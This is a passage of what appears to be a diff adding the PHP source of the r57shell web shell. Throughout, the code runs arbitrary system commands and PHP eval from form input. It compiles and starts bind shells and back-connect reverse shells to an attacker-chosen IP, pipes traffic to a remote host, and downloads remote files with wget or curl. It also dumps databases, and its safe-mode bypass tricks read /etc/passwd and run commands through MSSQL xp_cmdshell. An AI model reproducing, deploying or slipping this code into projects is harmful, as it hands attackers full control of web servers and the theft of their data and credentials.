(!empty($only_read)?("<br><br>".$lang[$language.'_text44']):("<br><br><input type=submit name=submit value=\" ".$lang[$language.'_butt10']." \">")); + echo "</div>"; + echo "</font>"; + echo "</form>"; + echo "</td></tr></table>"; + exit(); + } + } +if(!empty($_POST['cmd']) && $_POST['cmd']=="save_file") + { + if(!$file=@fopen($_POST['e_name'],"w")) { echo we($_POST['e_name']); } + else { + @fwrite($file,$_POST['e_text']); + @fclose($file); + $_POST['cmd']=""; + echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text45']."</b></font></div></td></tr></table>"; + } + } +if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C")) +{ + cf("/tmp/bd.c",$port_bind_bd_c); + $blah = ex("gcc -o /tmp/bd /tmp/bd.c"); + @unlink("/tmp/bd.c"); + $blah = ex("/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." &"); + $_POST['cmd']="ps -aux | grep bd"; +} +if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl")) +{ + cf("/tmp/bdpl",$port_bind_bd_pl); + $p2=which("perl"); + if(empty($p2)) $p2="perl"; + $blah = ex($p2." /tmp/bdpl ".$_POST['port']." &"); + $_POST['cmd']="ps -aux | grep bdpl"; +} +if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl")) +{ + cf("/tmp/back",$back_connect); + $p2=which("perl"); + if(empty($p2)) $p2="perl"; + $blah = ex($p2." /tmp/back ".$_POST['ip']." ".$_POST['port']." &"); + $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\""; +} +if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C")) +{ + cf("/tmp/back.c",$back_connect_c); + $blah = ex("gcc -o /tmp/backc /tmp/back.c"); + @unlink("/tmp/back.c"); + $blah = ex("/tmp/backc ".$_POST['ip']." ".$_POST['port']." &"); + $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\""; +} +if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="Perl")) +{ + cf("/tmp/dp",$datapipe_pl); + $p2=which("perl"); + if(empty($p2)) $p2="perl"; + $blah = ex($p2." /tmp/dp ".$_POST['local_port']." ".$_POST['remote_host']." ".$_POST['remote_port']." &"); + $_POST['cmd']="ps -aux | grep dp"; +} +if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="C")) +{ + cf("/tmp/dpc.c",$datapipe_c); + $blah = ex("gcc -o /tmp/dpc /tmp/dpc.c"); + @unlink("/tmp/dpc.c"); + $blah = ex("/tmp/dpc ".$_POST['local_port']." ".$_POST['remote_port']." ".$_POST['remote_host']." &"); + $_POST['cmd']="ps -aux | grep dpc"; +} +if (!empty($_POST['alias'])){ foreach ($aliases as $alias_name=>$alias_cmd) { if ($_POST['alias'] == $alias_name){$_POST['cmd']=$alias_cmd;}}} +if (!empty($HTTP_POST_FILES['userfile']['name'])) +{ +if(isset($_POST['nf1']) && !empty($_POST['new_name'])) { $nfn = $_POST['new_name']; } +else { $nfn = $HTTP_POST_FILES['userfile']['name']; } +@copy($HTTP_POST_FILES['userfile']['tmp_name'], + $_POST['dir']."/".$nfn) + or print("<font color=red face=Fixedsys><div align=center>Error uploading file ".$HTTP_POST_FILES['userfile']['name']."</div></font>"); +} +if (!empty($_POST['with']) && !empty($_POST['rem_file']) && !empty($_POST['loc_file'])) +{ + switch($_POST['with']) + { + case wget: + $_POST['cmd'] = which('wget')." ".$_POST['rem_file']." -O ".$_POST['loc_file'].""; + break; + case fetch: + $_POST['cmd'] = which('fetch')." -p ".$_POST['rem_file']." -o ".$_POST['loc_file'].""; + break; + case lynx: + $_POST['cmd'] = which('lynx')." -source ".$_POST['rem_file']." > ".$_POST['loc_file'].""; + break; + case links: + $_POST['cmd'] = which('links')." -source ".$_POST['rem_file']." > ".$_POST['loc_file'].""; + break; + case GET: + $_POST['cmd'] = which('GET')." ".$_POST['rem_file']." > ".$_POST['loc_file'].""; + break; + case curl: + $_POST['cmd'] = which('curl')." ".$_POST['rem_file']." -o ".$_POST['loc_file'].""; + break; + } +} +echo $table_up3; +if (empty($_POST['cmd'])&&!$safe_mode) { $_POST['cmd']=($windows)?("dir"):("ls -lia"); } +else if(empty($_POST['cmd'])&&$safe_mode){ $_POST['cmd']="safe_dir"; } +echo $font.$lang[$language.'_text1'].": <b>".$_POST['cmd']."</b></font></td></tr><tr><td><b><div align=center><textarea name=report cols=121 rows=15>"; +if($safe_mode) +{ + switch($_POST['cmd']) + { + case 'safe_dir': + $d=@dir($dir); + if ($d) + { + while (false!==($file=$d->read())) + { + if ($file=="." || $file=="..") continue; + @clearstatcache(); + list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file); + if($windows){ + echo date("d.m.Y H:i",$mtime); + if(@is_dir($file)) echo " <DIR> "; else printf("% 7s ",$size); + } + else{ + $owner = @posix_getpwuid($uid); + $grgid = @posix_getgrgid($gid); + echo $inode." "; + echo perms(@fileperms($file)); + printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size); + echo date("d.m.Y H:i ",$mtime); + } + echo "$file\n"; + } + $d->close(); + } + else echo $lang[$language._text29]; + break; + case 'safe_file': + if(@is_file($_POST['file'])) + { + $file = @file($_POST['file']); + if($file) + { + $c = @sizeof($file); + for($i=0;$i<$c;$i++) { echo htmlspecialchars($file[$i]); } + } + else echo $lang[$language._text29]; + } + else echo $lang[$language._text31]; + break; + case 'test1': + $ci = @curl_init("file://".$_POST['test1_file'].""); + $cf = @curl_exec($ci); + echo $cf; + break; + case 'test2': + @include($_POST['test2_file']); + break; + case 'test3': + if(!isset($_POST['test3_port'])||empty($_POST['test3_port'])) { $_POST['test3_port'] = "3306"; } + $db = @mysql_connect('localhost:'.$_POST['test3_port'],$_POST['test3_ml'],$_POST['test3_mp']); + if($db) + { + if(@mysql_select_db($_POST['test3_md'],$db)) + { + $sql = "DROP TABLE IF EXISTS temp_r57_table;"; + @mysql_query($sql); + $sql = "CREATE TABLE `temp_r57_table` ( `file` LONGBLOB NOT NULL );"; + @mysql_query($sql); + $sql = "LOAD DATA INFILE \"".$_POST['test3_file']."\" INTO TABLE temp_r57_table;"; + @mysql_query($sql); + $sql = "SELECT * FROM temp_r57_table;"; + $r = @mysql_query($sql); + while(($r_sql = @mysql_fetch_array($r))) { echo @htmlspecialchars($r_sql[0]); } + $sql = "DROP TABLE IF EXISTS temp_r57_table;"; + @mysql_query($sql); + } + else echo "[-] ERROR! Can't select database"; + @mysql_close($db); + } + else echo "[-] ERROR! Can't connect to mysql server"; + break; + case 'test4': + if(!isset($_POST['test4_port'])||empty($_POST['test4_port'])) { $_POST['test4_port'] = "1433"; } + $db = @mssql_connect('localhost,'.$_POST['test4_port'],$_POST['test4_ml'],$_POST['test4_mp']); + if($db) + { + if(@mssql_select_db($_POST['test4_md'],$db)) + { + @mssql_query("drop table r57_temp_table",$db); + @mssql_query("create table r57_temp_table ( string VARCHAR (500) NULL)",$db); + @mssql_query("insert into r57_temp_table EXEC master.dbo.xp_cmdshell '".$_POST['test4_file']."'",$db); + $res = mssql_query("select * from r57_temp_table",$db); + while(($row=@mssql_fetch_row($res))) + { + echo $row[0]."\r\n"; + } + @mssql_query("drop table r57_temp_table",$db); + } + else echo "[-] ERROR! Can't select database"; + @mssql_close($db); + } + else echo "[-] ERROR! Can't connect to MSSQL server"; + break; + } +} +else if(($_POST['cmd']!="php_eval")&&($_POST['cmd']!="mysql_dump")&&($_POST['cmd']!="db_show")&&($_POST['cmd']!="db_query")){ + $cmd_rep = ex($_POST['cmd']); + if($windows) { echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\n"; } + else { echo @htmlspecialchars($cmd_rep)."\n"; }} +if ($_POST['cmd']=="php_eval"){ + $eval = @str_replace("<?","",$_POST['php_eval']); + $eval = @str_replace("?>","",$eval); + @eval($eval);} +if ($_POST['cmd']=="db_show") + { + switch($_POST['db']) + { + case 'MySQL': + if(empty($_POST['db_port'])) { $_POST['db_port'] = '3306'; } + $db = @mysql_connect('localhost:'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']); + if($db) + { + $res=@mysql_query("SHOW DATABASES", $db); + while(($row=@mysql_fetch_row($res))) + { + echo "[+] ".$row[0]."\r\n"; + if(isset($_POST['st'])){ + $res2 = @mysql_query("SHOW TABLES FROM ".$row[0],$db); + while(($row2=@mysql_fetch_row($res2))) + { + echo " | - ".$row2[0]."\r\n"; + if(isset($_POST['sc'])) + { + $res3 = @mysql_query("SHOW COLUMNS FROM ".$row[0].".".$row2[0],$db); + while(($row3=@mysql_fetch_row($res3))) { echo " | - ".$row3[0]."\r\n"; } + } + } + } + } + @mysql_close($db); + } + else echo "[-] ERROR! Can't connect to MySQL server"; + break; + case 'MSSQL': + if(empty($_POST['db_port'])) { $_POST['db_port'] = '1433'; } + $db = @mssql_connect('localhost,'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']); + if($db) + { + $res=@mssql_query("sp_databases", $db); + while(($row=@mssql_fetch_row($res))) + { + echo "[+] ".$row[0]."\r\n"; + if(isset($_POST['st'])){ + @mssql_select_db($row[0]); + $res2 = @mssql_query("sp_tables",$db); + while(($row2=@mssql_fetch_array($res2))) + { + if($row2['TABLE_TYPE'] == 'TABLE' && $row2['TABLE_NAME'] != 'dtproperties') + { + echo " | - ".$row2['TABLE_NAME']."\r\n"; + if(isset($_POST['sc'])) + { + $res3 = @mssql_query("sp_columns ".$row2[2],$db); + while(($row3=@mssql_fetch_array($res3))) { echo " | - ".$row3['COLUMN_NAME']."\r\n"; } + } + } + } + } + } + @mssql_close($db); + } + else echo "[-] ERROR! Can't connect to MSSQL server"; + break; + case 'PostgreSQL': + if(empty($_POST['db_port'])) { $_POST['db_port'] = '5432'; } + $str = "host='localhost' port='".$_POST['db_port']."' user='".$_POST['mysql_l']."' password='".$_POST['mysql_p']."' dbname='".$_POST['mysql_db']."'"; + $db = @pg_connect($str); + if($db) + { + $res=@pg_query($db,"SELECT datname FROM pg_database WHERE datistemplate='f'"); + while(($row=@pg_fetch_row($res))) + { + echo "[+] ".$row[0]."\r\n"; + } + @pg_close($db); + } + else echo "[-] ERROR! Can't connect to PostgreSQL server"; + break; + } + } +if ($_POST['cmd']=="mysql_dump") + { + if(isset($_POST['dif'])) { $fp = @fopen($_POST['dif_name'], "w"); } + if((!empty($_POST['dif'])&&$fp)||(empty($_POST['dif']))){ + $sqh = "# homepage: http://rst.void.ru\r\n"; + $sqh .= "# ---------------------------------\r\n"; + $sqh .= "# date : ".date ("j F Y g:i")."\r\n"; + $sqh .= "# database : ".$_POST['mysql_db']."\r\n"; + $sqh .= "# table : ".$_POST['mysql_tbl']."\r\n"; + $sqh .= "# ---------------------------------\r\n\r\n"; + switch($_POST['db']){ + case 'MySQL': + if(empty($_POST['db_port'])) { $_POST['db_port'] = '3306'; } + $db = @mysql_connect('localhost:'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']); + if($db) + { + if(@mysql_select_db($_POST['mysql_db'],$db)) + { + $sql1 = "# MySQL dump created by r57shell\r\n"; + $sql1 .= $sqh; + $res = @mysql_query("SHOW CREATE TABLE `".$_POST['mysql_tbl']."`", $db); + $row = @mysql_fetch_row($res); + $sql1 .= $row[1]."\r\n\r\n"; + $sql1 .= "# ---------------------------------\r\n\r\n"; + $sql2 = ''; + $res = @mysql_query("SELECT * FROM `".$_POST['mysql_tbl']."`", $db); + if (@mysql_num_rows($res) > 0) { + while (($row = @mysql_fetch_assoc($res))) { + $keys = @implode("`, `", @array_keys($row)); + $values = @array_values($row); + foreach($values as $k=>$v) {$values[$k] = addslashes($v);} + $values = @implode("', '", $values); + $sql2 .= "INSERT INTO `".$_POST['mysql_tbl']."` (`".$keys."`) VALUES ('".htmlspecialchars($values)."');\r\n"; + } + $sql2 .= "\r\n# ---------------------------------"; + } + if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); } + else { echo $sql1.$sql2; } + } + else echo "[-] ERROR! Can't select database"; + @mysql_close($db); + } + else echo "[-] ERROR! Can't connect to MySQL server"; + break; + case 'MSSQL': + if(empty($_POST['db_port'])) { $_POST['db_port'] = '1433'; } + $db = @mssql_connect('localhost,'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']); + if($db) + { + if(@mssql_select_db($_POST['mysql_db'],$db)) + { + $sql1 = "# MSSQL dump created by r57shell\r\n"; + $sql1 .= $sqh; + $sql2 = ''; + $res = @mssql_query("SELECT * FROM ".$_POST['mysql_tbl']."", $db); + if (@mssql_num_rows($res) > 0) { + while (($row = @mssql_fetch_assoc($res))) { + $keys = @implode(", ", @array_keys($row)); + $values = @array_values($row); + foreach($values as $k=>$v) {$values[$k] = addslashes($v);} + $values = @implode("', '", $values); + $sql2 .= "INSERT INTO ".$_POST['mysql_tbl']." (".$keys.") VALUES ('".htmlspecialchars($values)."');\r\n"; + } + $sql2 .= "\r\n# ---------------------------------"; + } + if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); } + else { echo $sql1.$sql2; } + } + else echo "[-] ERROR! Can't select database"; + @mssql_close($db); + } + else echo "[-] ERROR! Can't connect to MSSQL server"; + break; + case 'PostgreSQL': + if(empty($_POST['db_port'])) { $_POST['db_port'] = '5432'; } + $str = "host='localhost' port='".$_POST['db_port']."' user='".$_POST['mysql_l']."' password='".$_POST['mysql_p']."' dbname='".$_POST['mysql_db']."'"; + $db = @pg_connect($str); + if($db) + { + $sql1 = "# PostgreSQL dump created by r57shell\r\n"; + $sql1 .= $sqh; + $sql2 = ''; + $res = @pg_query($db,"SELECT * FROM ".$_POST['mysql_tbl'].""); + if (@pg_num_rows($res) > 0) { + while (($row = @pg_fetch_assoc($res))) { + $keys = @implode(", ", @array_keys($row)); + $values = @array_values($row); + foreach($values as $k=>$v) {$values[$k] = addslashes($v);} + $values = @implode("', '", $values); + $sql2 .= "INSERT INTO ".$_POST['mysql_tbl']." (".$keys.") VALUES ('".htmlspecialchars($values)."');\r\n"; + } + $sql2 .= "\r\n# ---------------------------------"; + } + if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); } + else { echo $sql1.$sql2; } + @pg_close($db); + } + else echo "[-] ERROR! Can't connect to PostgreSQL server"; + break; + } + } + else if(!empty($_POST['dif'])&&!$fp) { echo "[-] ERROR! Can't write in dump file"; } + } +echo "</textarea></div>"; +echo "</b>"; +echo "</td></tr></table>"; +echo "<table width=100% cellpadding=0 cellspacing=0>"; +if(!$safe_mode){ +echo $fs.$table_up1.$lang[$language.'_text2'].$table_up2.$ts; +echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','cmd',85,'')); +echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1'])); +echo $te.$table_end1.$fe; +} +else{ +echo $fs.$table_up1.$lang[$language.'_text28'].$table_up2.$ts; +echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).in('hidden','cmd',0,'safe_dir').ws(4).in('submit','submit',0,$lang[$language.'_butt6'])); +echo $te.$table_end1.$fe; +} +echo $fs.$table_up1.$lang[$language.'_text42'].$table_up2.$ts; +echo sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','e_name',85,$dir).in('hidden','cmd',0,'edit_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt11'])); +echo $te.$table_end1.$fe; +if($safe_mode){ +echo $fs.$table_up1.$lang[$language.'_text57'].$table_up2.$ts; +echo sr(15,"<b>".$lang[$language.'_text58'].$arrow."</b>",in('text','mk_name',54,(!empty($_POST['mk_name'])?($_POST['mk_name']):("new_name"))).ws(4)."<select name=action><option value=create>".$lang[$language.'_text65']."</option><option value=delete>".$lang[$language.'_text66']."</option></select>".ws(3)."<select name=what><option value=file>".$lang[$language.'_text59']."</option><option value=dir>".$lang[$language.'_text60']."</option></select>".in('hidden','cmd',0,'mk').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt13'])); +echo $te.$table_end1.$fe; +} +if($safe_mode && $unix){ +echo $fs.$table_up1.$lang[$language.'_text67'].$table_up2.$ts; +echo sr(15,"<b>".$lang[$language.'_text68'].$arrow."</b>","<select name=what><option value=mod>CHMOD</option><option value=own>CHOWN</option><option value=grp>CHGRP</option></select>".ws(2)."<b>".$lang[$language.'_text69'].$arrow."</b>".ws(2).in('text','param1',40,(($_POST['param1'])?($_POST['param1']):("filename"))).ws(2)."<b>".$lang[$language.'_text70'].$arrow."</b>".ws(2).in('text','param2 title="'.$lang[$language.'_text71'].'"',26,(($_POST['param2'])?($_POST['param2']):("0777"))).in('hidden','cmd',0,'ch_').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1'])); +echo $te.$table_end1.$fe; +} +if(!$safe_mode){ +foreach ($aliases as $alias_name=>$alias_cmd) + { + $aliases2 .= "<option>$alias_name</option>"; + } +echo $fs.$table_up1.$lang[$language.'_text7'].$table_up2.$ts; +echo sr(15,"<b>".ws(9).$lang[$language.'_text8'].$arrow.ws(4)."</b>","<select name=alias>".$aliases2."</select>".in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1'])); +echo $te.$table_end1.$fe; +} +echo $fs.$table_up1.$lang[$language.'_text54'].$table_up2.$ts; +echo sr(15,"<b>".$lang[$language.'_text52'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12'])); +echo sr(15,"<b>".$lang[$language.'_text53'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )"); +echo sr(15,"<b>".$lang[$language.'_text55'].$arrow."</b>",in('checkbox','m id=m',0,'1').in('text','s_mask',82,'.txt;.php')."* ( .txt;.php;.htm )".in('hidden','cmd',0,'search_text').in('hidden','dir',0,$dir)); +echo $te.$table_end1.$fe; +echo $fs.$table_up1.$lang[$language.'_text76'].$table_up2.$ts; +echo sr(15,"<b>".$lang[$language.'_text72'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12'])); +echo sr(15,"<b>".$lang[$language.'_text73'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )"); +echo sr(15,"<b>".$lang[$language.'_text74'].$arrow."</b>",in('text','s_mask',85,'*.[hc]').ws(1).$lang[$language.'_text75'].in('hidden','cmd',0,'find_text').in('hidden','dir',0,$dir)); +echo $te.$table_end1.$fe; +echo $fs.$table_up1.$lang[$language.'_text32'].$table_up2.$font; +echo "<div align=center><textarea name=php_eval cols=100 rows=3>"; +echo (!empty($_POST['php_eval'])?($_POST['php_eval']):("/* delete script */\r\n//unlink(\"r57shell.php\");\r\n//readfile(\"/etc/passwd\");")); +echo "</textarea>"; +echo in('hidden','dir',0,$dir).in('hidden','cmd',0,'php_eval'); +echo "<br>".ws(1).in('submit','submit',0,$lang[$language.'_butt1']); +echo "</font>"; +echo $table_end1.$fe; +if($safe_mode&&$curl_on) +{ +echo $fs.$table_up1.$lang[$language.'_text33'].$table_up2.$ts; +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test1_file',85,(!empty($_POST['test1_file'])?($_POST['test1_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test1').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.$table_end1.$fe; +} +if($safe_mode) +{ +echo $fs.$table_up1.$lang[$language.'_text34'].$table_up2.$ts; +echo "<table class=table1 width=100% align=center>"; +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test2_file',85,(!empty($_POST['test2_file'])?($_POST['test2_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test2').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.$table_end1.$fe; +} +if($safe_mode&&$mysql_on) +{ +echo $fs.$table_up1.$lang[$language.'_text35'].$table_up2.$ts; +echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test3_md',15,(!empty($_POST['test3_md'])?($_POST['test3_md']):("mysql"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test3_ml',15,(!empty($_POST['test3_ml'])?($_POST['test3_ml']):("root"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test3_mp',15,(!empty($_POST['test3_mp'])?($_POST['test3_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test3_port',15,(!empty($_POST['test3_port'])?($_POST['test3_port']):("3306")))); +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test3_file',96,(!empty($_POST['test3_file'])?($_POST['test3_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test3').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.$table_end1.$fe; +} +if($safe_mode&&$mssql_on) +{ +echo $fs.$table_up1.$lang[$language.'_text85'].$table_up2.$ts; +echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test4_md',15,(!empty($_POST['test4_md'])?($_POST['test4_md']):("master"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test4_ml',15,(!empty($_POST['test4_ml'])?($_POST['test4_ml']):("sa"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test4_mp',15,(!empty($_POST['test4_mp'])?($_POST['test4_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test4_port',15,(!empty($_POST['test4_port'])?($_POST['test4_port']):("1433")))); +echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test4_file',96,(!empty($_POST['test4_file'])?($_POST['test4_file']):("dir"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test4').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.$table_end1.$fe; +} +if(@ini_get('file_uploads')){ +echo "<form name=upload method=POST ENCTYPE=multipart/form-data>"; +echo $table_up1.$lang[$language.'_text5'].$table_up2.$ts; +echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile',85,'')); +echo sr(15,"<b>".$lang[$language.'_text21'].$arrow."</b>",in('checkbox','nf1 id=nf1',0,'1').in('text','new_name',82,'').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2'])); +echo $te.$table_end1.$fe; +} +if(!$safe_mode&&!$windows){ +echo $fs.$table_up1.$lang[$language.'_text15'].$table_up2.$ts; +echo sr(15,"<b>".$lang[$language.'_text16'].$arrow."</b>","<select size=\"1\" name=\"with\"><option value=\"wget\">wget</option><option value=\"fetch\">fetch</option><option value=\"lynx\">lynx</option><option value=\"links\">links</option><option value=\"curl\">curl</option><option value=\"GET\">GET</option></select>".in('hidden','dir',0,$dir).ws(2)."<b>".$lang[$language.'_text17'].$arrow."</b>".in('text','rem_file',78,'http://')); +echo sr(15,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',105,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2'])); +echo $te.$table_end1.$fe; +} +if($mysql_on||$mssql_on||$pg_on||$ora_on) +{ +echo $table_up1.$lang[$language.'_text82'].$table_up2.$ts."<tr>".$fs."<td valign=top width=34%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center>".$lang[$language.'_text77']."</div></b></font>"; +echo sr(45,"<b>".$lang[$language.'_text80'].$arrow."</b>","<select name=db><option>MySQL</option><option>MSSQL</option><option>PostgreSQL</option></select>"); +echo sr(45,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306")))); +echo sr(45,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root")))); +echo sr(45,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password")))); +echo sr(45,"<b>".$lang[$language.'_text78'].$arrow."</b>",in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_show').in('checkbox','st id=st',0,'1')); +echo sr(45,"<b>".$lang[$language.'_text79'].$arrow."</b>",in('checkbox','sc id=sc',0,'1')); +echo sr(45,"",in('submit','submit',0,$lang[$language.'_butt7'])); +echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center>".$lang[$language.'_text40']."</div></b></font>"; +echo sr(45,"<b>".$lang[$language.'_text80'].$arrow."</b>","<select name=db><option>MySQL</option><option>MSSQL</option><option>PostgreSQL</option></select>"); +echo sr(45,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306")))); +echo sr(45,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root")))); +echo sr(45,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password")))); +echo sr(45,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql")))); +echo sr(45,"<b>".$lang[$language.'_text39'].$arrow."</b>",in('text','mysql_tbl',15,(!empty($_POST['mysql_tbl'])?($_POST['mysql_tbl']):("user")))); +echo sr(45,in('hidden','dir',0,$dir).in('hidden','cmd',0,'mysql_dump')."<b>".$lang[$language.'_text41'].$arrow."</b>",in('checkbox','dif id=dif',0,'1')); +echo sr(45,"<b>".$lang[$language.'_text59'].$arrow."</b>",in('text','dif_name',15,(!empty($_POST['dif_name'])?($_POST['dif_name']):("dump.sql")))); +echo sr(45,"",in('submit','submit',0,$lang[$language.'_butt9'])); +echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center>".$lang[$language.'_text83']."</div></b></font>"; +echo sr(45,"<b>".$lang[$language.'_text80'].$arrow."</b>","<select name=db><option>MySQL</option><option>MSSQL</option><option>PostgreSQL</option><option>Oracle</option></select>"); +echo sr(45,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306")))); +echo sr(45,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root")))); +echo sr(45,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password")))); +echo sr(45,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql")))); +echo sr(45,"<b>".$lang[$language.'_text84'].$arrow."</b>".in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_query'),""); +echo $te."<div align=center><textarea cols=35 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br>".in('submit','submit',0,$lang[$language.'_butt1'])."</div></td>".$fe."</tr></table>"; +} +if(!$safe_mode&&!$windows){ +echo $table_up1.$lang[$language.'_text81'].$table_up2.$ts."<tr>".$fs."<td valign=top width=34%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center>".$lang[$language.'_text9']."</div></b></font>"; +echo sr(40,"<b>".$lang[$language.'_text10'].$arrow."</b>",in('text','port',15,'11457')); +echo sr(40,"<b>".$lang[$language.'_text11'].$arrow."</b>",in('text','bind_pass',15,'r57')); +echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir)); +echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt3'])); +echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center>".$lang[$language.'_text12']."</div></b></font>"; +echo sr(40,"<b>".$lang[$language.'_text13'].$arrow."</b>",in('text','ip',15,((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1")))); +echo sr(40,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','port',15,'11457')); +echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir)); +echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt4'])); +echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center>".$lang[$language.'_text22']."</div></b></font>"; +echo sr(40,"<b>".$lang[$language.'_text23'].$arrow."</b>",in('text','local_port',15,'11457')); +echo sr(40,"<b>".$lang[$language.'_text24'].$arrow."</b>",in('text','remote_host',15,'irc.dalnet.ru')); +echo sr(40,"<b>".$lang[$language.'_text25'].$arrow."</b>",in('text','remote_port',15,'6667')); +echo 